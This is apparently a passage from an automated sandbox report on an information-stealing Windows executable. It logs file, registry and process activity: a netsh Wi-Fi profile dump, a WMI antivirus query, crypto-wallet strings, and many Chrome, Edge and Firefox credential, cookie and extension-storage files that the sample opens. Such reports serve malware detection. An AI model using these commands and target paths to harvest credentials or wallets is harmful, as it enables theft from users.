              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1EC330 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6FB1EC330
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB20518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6FB20518C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B348CC GetModuleFileNameW,GetVersionExW,LoadLibraryW,LoadLibraryW,65_2_00007FF629B348CC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara matchFile source: 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1982906328.000002290B033000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1986903181.000002290AFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1720264732.000001F32EEE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1984419770.000002290AFF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1982629773.000002290B711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1720264732.000001F32EEE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1983434642.000002290B038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1983989604.000002290AFCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: e45AiBoV6X.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: e45AiBoV6X.exe PID: 7396, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI73802\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: e45AiBoV6X.exe PID: 7396, type: MEMORYSTR
Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: Electrum
Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: Jaxxz
Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: Exodusz
Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: EthereumZ
Source: e45AiBoV6X.exe, 00000001.00000002.1987882294.000002290B4E0000.00000004.00001000.00020000.00000000.sdmp  String found in binary or memory: sers\user\AppData\Local\Coinomi\Coinomi\wallets
Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: keystoreZ
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Users\user\Desktop\e45AiBoV6X.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
